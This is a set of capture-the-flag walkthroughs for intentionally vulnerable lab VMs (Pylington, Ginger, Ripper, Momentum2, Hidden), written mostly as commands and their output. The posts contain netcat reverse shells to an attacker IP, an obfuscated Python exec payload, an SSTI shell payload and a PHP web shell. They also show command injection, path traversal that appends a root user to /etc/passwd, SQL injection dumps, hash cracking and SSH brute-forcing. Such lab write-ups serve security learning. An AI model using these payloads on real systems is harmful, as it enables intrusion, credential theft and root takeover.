Vulnhub Pylington: 1 Walkthrough

https://www.vulnhub.com/entry/pylington-1,684/

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                                      
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)    
 80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /register             (Status: 301) [Size: 239] [--> http://192.168.56.100/register/]
 /index.html           (Status: 200) [Size: 4065]                                      
 /assets               (Status: 301) [Size: 237] [--> http://192.168.56.100/assets/]  
 /404.html             (Status: 200) [Size: 3305]                                      
 /robots.txt           (Status: 200) [Size: 83]

Check robots.txt

 ~ cat robots.txt    
 User-agent: *
 Disallow: /register
 Disallow: /login
 Disallow: /zbir7mn240soxhicso2z

Visit /zbir7mn240soxhicso2z, get username and password.

 Username: steve
 Password: bvbkukHAeVxtjjVH

 strimp='imp'+'ort'+' o'+'s;'
 strcmd='o'+'s.system("nc 192.168.56.150 1234 -e /bin/bash")'
 exec(strimp)
 exec(strcmd)

Get reverse shell.

 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:51044.
 id
 uid=33(http) gid=33(http) groups=33(http)

In home folder of user py, get typing.cc.

 [http@archlinux py]$ ls -la
 ls -la
 total 56
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 .
 drwxr-xr-x 3 root root  4096 Apr  7 18:43 ..
 -rw------- 1 py   py      21 Dec 20 18:44 .bash_logout
 -rw------- 1 py   py      57 Dec 20 18:44 .bash_profile
 -rw------- 1 py   py     141 Dec 20 18:44 .bashrc
 -r-------- 1 py   py      11 Apr  9 12:04 password.txt
 drwx------ 2 py   py    4096 Apr  9 19:31 secret_stuff
 -r-sr-xr-x 1 py   py   19216 Apr  9 12:15 typing
 -r--r--r-- 1 py   py     689 Apr  9 12:15 typing.cc
 -r-------- 1 py   py      34 Apr  9 12:32 user.txt

Check source code of typing.cc. Get password of py.

 [http@archlinux py]$ ./typing
 ./typing
 Let's play a game! If you can type the sentence below, then I'll tell you my password.

 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 54ezhCGaJV

Ssh login as user py, in /home/py/secret_stuff folder, found backup.cc.

[py@archlinux ~]$ cd secret_stuff/
 [py@archlinux secret_stuff]$ ls -la
 total 40
 drwx------ 2 py   py    4096 Apr  9 19:31 .
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 ..
 -rwsr-xr-x 1 root root 26128 Apr  9 19:30 backup
 -rw-r--r-- 1 root root   586 Apr  9 19:30 backup.cc
 [py@archlinux secret_stuff]$

Check source code of backup.cc.

```
[py@archlinux secret_stuff]$ cat backup.cc

include <iostream>

include <string>

include <fstream>

int main(){
std::cout<<"Enter a line of text to back up: ";
std::string line;
std::getline(std::cin,line);
std::string path;
std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
std::getline(std::cin,path);

 if(!path.starts_with("/srv/backups/")){
     std::cout<<"The file must be inside the /srv/backups directory!\n";
 }
 else{
     std::ofstream backup_file(path,std::ios_base::app);
     backup_file<<line<<'\n';
 }
 return 0;

}


That means we can write new user with root privilege into /etc/passwd.

[py@archlinux secret_stuff]$ ./backup
Enter a line of text to back up: root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd
[py@archlinux secret_stuff]$ su root2
Password:
[root@archlinux secret_stuff]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux archlinux 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux

HackMyVm Ginger Walkthrough

发表评论

HackMyVm Ginger Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ginger

Find IP of VM.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                                                         ...
 192.168.56.100  08:00:27:45:72:fc       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
 /latest.zip           (Status: 200) [Size: 16866701]

Scan vulnerability of wordpress.

 ~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
 ...
 [+] cp-multi-view-calendar
  | Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
  | Last Updated: 2021-03-08T13:47:00.000Z
  | Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
  | [!] The version is out of date, the latest version is 1.3.99
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
  |
  | [!] 2 vulnerabilities identified:
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
  |     Fixed in: 1.1.5
  |     References:
  |      - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
  |      - https://www.exploit-db.com/exploits/36243/
  |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
  |     Fixed in: 1.1.8
  |     References:
  |      - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
  |      - https://www.exploit-db.com/exploits/37560/
  |
  | Version: 1.0.2 (50% confidence)
  | Found By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt

Seach the exploit in exploitdb.

~ searchsploit CP Multi View Event Calendar                                                       fish-0 | 0 [14:21:49]
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path                           ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection                   | php/webapps/35073.txt          
 WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection                  | php/webapps/37560.txt          
 ------------------------------------------------------------------------------------- ---------------------------------

Check 37560.txt, find the sql injection point, and use sqlmap to dump database.

 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5 --dbs --batch
 ...
 available databases [2]:
 [*] information_schema
 [*] wordpress_db
 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5  -D wordpress_db -T wp_users --dump
 ...
 Table: wp_users
 [1 entry]
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | 1  | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Crack the password hash with john the ripper.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 ~ john --show hash.txt            
 ?:sanitarium

image-20210609142750078.png

Visit the shell code and get reverse shell.

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

~ nc -nvlp 1234 ...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


 Found 3 users in /home.

www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster


 Found hint of sabrina.

www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory


Get the password through dmesg.

www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch


Log in ssh as sabrina, check sudo -l.

sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *


Check app.py, it's http server with SSTI on port 5000.

 ```
sabrina@ginger:~$ cat /opt/app.py

 from flask import Flask, request, render_template_string,render_template

 app = Flask(__name__)
 @app.route('/')
 def hello_ssti():
     person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
     if request.args.get('name'):
         person['name'] = request.args.get('name')
     template = '''<h2>Hello %s!</h2>''' % person['name']
     return render_template_string(template,person=person)
 def get_user_file(f_name):
     with open(f_name) as f:
         return f.readlines()
 app.jinja_env.globals['get_user_file'] = get_user_file

 if __name__ == "__main__":
     app.run(debug=True)

Start the server as webmaster.

sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
  * Serving Flask app "app" (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: on
  * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
  * Restarting with stat
  * Debugger is active!
  * Debugger PIN: 260-511-262

In another terminal, use ssh to port forward port 5000.

 ~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100

Visit the server with SSTI shell code.

```
127.0.0.1:5000/?name={{request.application.globals.builtins.import(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}


At the same time, use nc to listen to specific port, and get reverse shell as webmaster.

~ nc -nlvp 1234 fish-0 | 0 [14:34:52]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)


Upload id_rsa.pub to /home/webmaster/.ssh, change name to authorized_keys and chmod 600.

 ```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
 cd /home/webmaster
 webmaster@ginger:~$ mkdir .ssh
 mkdir .ssh
 webmaster@ginger:~$ cd .ssh
 cd .ssh
 webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 ...
 Saving to: ‘authorized_keys’
 authorized_keys     100%[===================>]     565  --.-KB/s    in 0s    
 webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
 chmod 600 authorized_keys

Now we can login ssh as webmaster

~ ssh webmaster@192.168.56.100  
 ...
 webmaster@ginger:~$ id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload pspy64 to VM and check it.

```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh


UID 1002 is user caroline, and the /home/backup folder is writable to webmaster.

drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup


Write bash code into /home/caroine/backup/backup.sh.

 ```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
 webmaster@ginger:/home/caroline$ rm backup/backup.sh          
 rm: remove write-protected regular file 'backup/backup.sh'? yes
 webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/

Then we get reverse shell as caroline. Again, upload id_rsa.pub and get ssh access. Check sudo -l.

caroline@ginger:~$ sudo -l
 Matching Defaults entries for caroline on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User caroline may run the following commands on ginger:
     (ALL : ALL) NOPASSWD: /srv/code

Disassemble code, it just calls chmod to make passwd writable in 5 seconds.

```
int __cdecl main(int argc, const char argv, const char envp)
{
system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
return 0;
}


In 5 seconds, we write a new root user with password hash into file /etc/passwd.

caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#

HackMyVm Ripper Walkthrough

发表评论

HackMyVm Ripper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. Old ssh connection files may mean id_rsa.bak.

```
cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.


Take care the screen of VM told us the user name jack.

image-20210603115519124.png

Download id_rsa.bak, try to connect ssh, it's encrypted.

wget http://192.168.56.100/id_rsa.bak
2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]

ssh jack@192.168.56.100 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':


Use following code to brute force password.

cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C “jack@192.168.56.100” -P $pass -f id_rsa.bak &>/dev/null; then echo $pass; break; fi; done
bananas


Login as jack. After some enum, found nothing useful.

Download linpeas from github. Upload to VM.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh


Run linpeas.sh, get a strange string.

[+] Hashes inside passwd file? ........... No
[+] Writable passwd file? ................ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
[+] Can I write in network-scripts? ...... No
[+] Can I read root folder? .............. No


It's the password of another user helder.

Download pspy64 from github(https://github.com/DominicBreuker/pspy), upload to VM, check system process.

2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1206 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi


The bash code means, if /root/.local/helder.txt is equal to /home/helder/passwd.txt, then we can send a string (like XXX) to port 10000, and system will set SUID bit of /usr/bin/XXX.

So we make a symbolic link, and send port 10000 string "bash". After a minute, /usr/bin/bash has been set SUID.

helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
helder@ripper:~$echo bash |nc -nlvp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
helder@ripper:~$ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash


Get root finally.

 ```
helder@ripper:~$/usr/bin/bash -p
 helder@ripper:~$id
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)

HackMyVm Momentum2 Walkthrough

发表评论

HackMyVm Momentum2 Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                      sudo-0 | 0 [15:05:51]
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================                  
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. We need to set some parameter to upload php file.

 cat ajax.php.bak  
     //The boss told me to add one more Upper Case letter at the end of the cookie
    if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
        //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
    }
    else{
         $valid_ext = array("txt");
    }
    // Remember success upload returns 1 ⏎

Generate dic file of cookies.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with shell code in it.

 cat cmd.php                                                                                                                                                                                   fish-0 | 0 [21:02:13]
 <?php
 system($_GET["cmd"])
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with burpsuite.

[image-20210531210127178.png]

Send the request to Repeater, add cookie "admin=xxx", which we will bruteforce later, and add parameter "secure=val1d". Take care, it's not valid. If we click send now, response code will be 0, which means failed.

[image-20210531212540903.png]

Then send it to intruder, add §§ sign to admin=§xxxxx§.

[image-20210531213130392.png]

Set payload as cookie.txt we just generated.

image-20210531213158667 [image-20210531213158667.png]

Click start attack. Then we get the right cookie with response code 1.

[image-20210531213313743.png]

And cmd.php has been uploaded to /owls.

[image-20210531213353093.png]

Check if cmd.php works OK.

 ~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 -------------------------------------------------------------------------------------------------------
 nc -nlvp 1234                                                                    fish-0 | 130 [15:44:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, found password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

Asterisk mark (*) means any character, we generate a dic.

```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt


Bruteforce ssh with user name athena and this dic.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f fish-0 | 0 [15:25:54]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*


Ssh login as athena, check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py


Run the py file, when asked for input seed, input shell code.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;


Listen to the port just input at another terminal, and get root shell.

nc -nvlp 1234 man-0 | 0 [15:32:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)

HackMyVm Hidden Walkthrough

发表评论

HackMyVm Hidden Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hidden

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                     sudo-0 | 0 [14:50:06]
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
 |   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
 |_  256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Level 1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 cat 80.log                                                                         fish-0 | 0 [19:39:15]
 /index.html           (Status: 200) [Size: 392]

Check index.html, found a png file and some hints.

[image-20210531194036612.png]

     <body>
         <h1><center>Welcome to level 1</center></h1>
          <center><img src="decodethis_pls.png"></center>
     </body>
     <!-- format xxx.xxxxxx.xxx -->

The png is tic-tac-toe Cipher. Decode it online.

[image-20210531174854759.png]

Add sys.hidden.hmv to /etc/hosts. Scan port 80 again.

 gobuster dir -u http://sys.hidden.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o sys.hidden.hmv.log
 ...
 /users                (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
 /members              (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
 /index.html           (Status: 200) [Size: 282]
 /weapon               (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]

Scan /weapon.

 gobuster dir -u http://sys.hidden.hmv/weapon -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o weapon.log
 ...
 /index.html           (Status: 200) [Size: 0]
 /loot.php             (Status: 200) [Size: 0]

Fuzz loot.php.

 wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
  ...
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000008724:   200        1 L      3 W        54 Ch       "hack"

Check RCE.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id'                               fish-0 | 0 [18:08:52]
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get reverse shell as www-data.

curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234                                                                      fish-0 | 0 [18:05:18]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:39104.
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@hidden:/var/www/hidden/weapon$

Check sudo.

 www-data@hidden:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hidden:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on hidden:
     (toreto) NOPASSWD: /usr/bin/perl

Get shell as toreto.

www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
 sudo -u toreto perl -e 'exec "/bin/bash";'
 toreto@hidden:~$ id
 id
 uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)

Upload id_rsa.pub in /home/toreto/.ssh, and rename it to authorized_keys, chmod 600.

```
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
<http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys


Then login ssh as toreto.

ssh toreto@192.168.56.99 fish-0 | 0 [19:42:48]
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 / ======= \
/ __________\

___

	_____		___

\=____/ Hack_MyVM - Hidden
/ """"""""""" \ -------------------
/ ::::::::::::: \
(____)

Congratulations!!! you have reached the last level!
Good Luck! 😉

Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$


In /home/atenea/.hidden, found a dic file.

toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt


Bruteforce password of atenea.

hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f nc-0 | 130 [19:29:55]
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
